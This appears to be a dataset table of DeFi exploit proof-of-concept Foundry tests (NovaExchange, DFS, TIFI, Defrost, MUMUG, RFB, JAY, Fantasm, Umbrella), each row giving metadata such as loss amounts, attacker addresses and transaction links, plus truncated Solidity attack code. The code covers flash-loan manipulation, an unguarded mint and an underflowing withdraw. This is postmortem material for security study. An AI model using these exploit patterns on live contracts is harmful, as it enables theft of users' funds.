// forge test --contr... | exploit_poc | NovaExchange | 2022-12 | NovaExchange_exp.sol | null | 2fbb9ff931598a6b | 2026-01-07T10:59:16.538268 | postmortems | bsc | 23,749,678 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
emit log_named_uint("Before exploit, NOVA balance of attacker:", novaContract.balanceOf(attacker));
cheats.prank(attacker);
novaContract.rewardHolders(10_000_000_000_000_000_000_000_000_000);
emit log_named_uint("After exploit, NOVA balance of attacker... | true | Unknown | 3.16 | low | NovaExchange Exploit (2022-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~1,450 US$
// Attacker : 0xb358BfD28b02c5e925b89aD8b0Eb35913D2d0805
// Attack Contract : 0x87bfd80c2a05ee98cfe188fd2a0e4d70187db137
// Vulnerable Contract : 0x2B806e6D78... | exploit_poc | DFS | 2022-12 | DFS_exp.sol | flash_loan | b4623b4d284e6465 | 2026-01-07T10:59:16.538312 | postmortems | bsc | 24,349,821 | ~1,450 US$ | 1 | null | null | null | https://bscscan.com/tx/0xcddcb447d64c2ce4b3ac5ebaa6d42e26d3ed0ff3831c08923c53ea998f598a7c | null | null | true | true | true | low | ~1,450 US$ | flash-loan | function testExploit() public {
Exploit exploit = new Exploit();
emit log_named_decimal_uint("[start] Attacker USDT Balance", IERC20(usdt).balanceOf(address(exploit)), 18);
exploit.harvest();
emit log_named_decimal_uint("[End] Attacker USDT Balance", IERC20(usdt).balanceOf(address(exploi... | true | ~1,450 US$ | https://bscscan.com/tx/0xcddcb447d64c2ce4b3ac5ebaa6d42e26d3ed0ff3831c08923c53ea998f598a7c | $1 | 8.62 | high | DFS Exploit (2022-12) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/peckshield/status/1601492605535399936
// @TX
// https://bscscan.com/tx/0x1c5272ce35338c57c6b9ea710a09766a17bbf14b61438940c3072ed49bfec402
interface TIFIFinance... | exploit_poc | TIFI | 2022-12 | TIFI_exp.sol | null | 8d530a446ff0dcc3 | 2026-01-07T10:59:16.538370 | postmortems | bsc | 23,778,726 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
WBNB.approve(address(TIFIRouter), type(uint256).max);
BUSD.approve(address(TIFI), type(uint256).max);
TIFIToken.approve(address(Router), type(uint256).max);
Pair.swap(5 * 1e18, 500 * 1e18, address(this), new bytes(1));
emit log_named_decimal_uint(... | true | Unknown | 3.37 | low | TIFI Exploit (2022-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/PeckShieldAlert/status/1606276020276891650
// @TX
// https://snowtrace.io/tx/0xc6fb8217e45870a93c25e2098f54f6e3b24674a3083c30664867de474bf0212d
interface LSWUS... | exploit_poc | Defrost | 2022-12 | Defrost_exp.sol | flash_loan | 201564bbb779fb58 | 2026-01-07T10:59:16.538409 | postmortems | avalanche | 24,003,940 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
flashLoanAmount = LSW.maxFlashLoan(address(USDC));
flashLoanFee = LSW.flashFee(address(USDC), flashLoanAmount);
Pair.swap(0, flashLoanAmount + flashLoanFee, address(this), new bytes(1));
emit log_named_decimal_uint("[End] Attacker USDC balance after explo... | true | Unknown | 4.19 | low | Defrost Exploit (2022-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BeosinAlert/status/1601422462012469248
// @TX
// https://snowtrace.io/tx/0xab39a17cdc200c812ecbb05aead6e6f574712170eafbd73736b053b168555680
interface MUBank {
... | exploit_poc | MUMUG | 2022-12 | MUMUG_exp.sol | flash_loan | a1129f1328d687b3 | 2026-01-07T10:59:16.538449 | postmortems | avalanche | 23,435,294 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
MU.approve(address(Router), type(uint256).max);
MUG.approve(address(Router), type(uint256).max);
USDC_e.approve(address(Router), type(uint256).max);
USDC_e.approve(address(Bank), type(uint256).max);
FlashLoanAmount = MU.balanceOf(address(Pair)) - 1... | true | Unknown | 4.52 | low | MUMUG Exploit (2022-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1599991294947778560
// @TX
// https://bscscan.com/tx/0xcc8fdb3c6af8bb9dfd87e913b743a13bbf138a143c27e0f387037887d28e3c7a
contract ContractTe... | exploit_poc | RFB | 2022-12 | RFB_exp.sol | flash_loan | a35a52a850dbf8b9 | 2026-01-07T10:59:16.538489 | postmortems | bsc | 23,649,423 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public payable {
RFB.approve(address(Router), type(uint256).max);
WBNB.approve(address(Router), type(uint256).max);
payable(address(uint160(0))).transfer(address(this).balance);
DVM(dodo).flashLoan(20 * 1e18, 0, address(this), new bytes(1));
emit log_named... | true | Unknown | 4.32 | low | RFB Exploit (2022-12) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~15.32 ETH
// Attacker : 0x0348D20b74Ddc0ac9bfC3626e06d30bb6Fac213b
// Attack Contract : https://etherscan.io/address/0xed42cb11b9d03c807ed1ba9c2ed1d3ba5bf37340
// Vulne... | exploit_poc | JAY | 2022-12 | JAY_exp.sol | flash_loan | 482af8031d437d0d | 2026-01-07T10:59:16.538531 | postmortems | ethereum | 16,288,199 | ~15.32 ETH | 15.32 | null | https://etherscan.io/address/0xed42cb11b9d03c807ed1ba9c2ed1d3ba5bf37340 | https://etherscan.io/address/0xf2919d1d80aff2940274014bef534f7791906ff2 | https://etherscan.io/tx/0xd4fafa1261f6e4f9c8543228a67caf9d02811e4ad3058a2714323964a8db61f6 | null | null | true | true | true | low | ~15.32 ETH | flash-loan | function testExploit() public {
// "Clean" contract's balance
payable(address(0)).transfer(address(this).balance);
emit log_named_decimal_uint("[Start] Attacker ETH balance before exploit", address(this).balance, 18);
// Setup flashloan parameters
address[] memory tokens = new a... | true | ~15.32 ETH | https://etherscan.io/address/0xed42cb11b9d03c807ed1ba9c2ed1d3ba5bf37340 | https://etherscan.io/address/0xf2919d1d80aff2940274014bef534f7791906ff2 | https://etherscan.io/tx/0xd4fafa1261f6e4f9c8543228a67caf9d02811e4ad3058a2714323964a8db61f6 | $15 | 9.58 | high | JAY Exploit (2022-12) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
IERC20 fsm = IERC20(0xaa621D2002b5a6275EF62d7a065A865167914801);
IERC20 xFTM =... | exploit_poc | Fantasm | 2022-03 | Fantasm_exp.sol | null | 071b4444fd81d7b9 | 2026-01-07T10:59:16.538585 | postmortems | unknown | 32,971,742 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
cheat.prank(0x9362e8cF30635de48Bdf8DA52139EEd8f1e5d400);
fsm.transfer(address(this), 100_000_000_000_000_000_000);
emit log_named_uint("Before exploit, xFTM balance of attacker:", xFTM.balanceOf(address(this)));
fsm.approve(address(pool), type(uint256).ma... | true | Unknown | 2.68 | low | Fantasm Exploit (2022-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 700k
// Attacker : 0x1751e3e1aaf1a3e7b973c889b7531f43fc59f7d0
// AttackContract : 0x89767960b76b009416bc7ff4a4b79051eed0a9ee
// StakingRewards contract: 0xB3FB1D01B07A70... | exploit_poc | Umbrella | 2022-03 | Umbrella_exp.sol | null | 3309738817deb550 | 2026-01-07T10:59:16.538623 | postmortems | ethereum | 14,421,983 | 700k | 700,000 | null | null | null | https://etherscan.io/tx/0x33479bcfbc792aa0f8103ab0d7a3784788b5b0e1467c81ffbed1b7682660b4fa | null | null | true | false | false | high | 700k | unknown | function testExploit() public {
emit log_named_decimal_uint("Before exploiting, Attacker UniLP Balance", uniLP.balanceOf(address(this)), 18);
StakingRewards.withdraw(8_792_873_290_680_252_648_282); //without putting any crypto, we can drain out the LP tokens in uniswap pool by underflow.
/*
... | true | 700k | $700.0K | 6 | medium | Umbrella Exploit (2022-03) | true | false | true | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.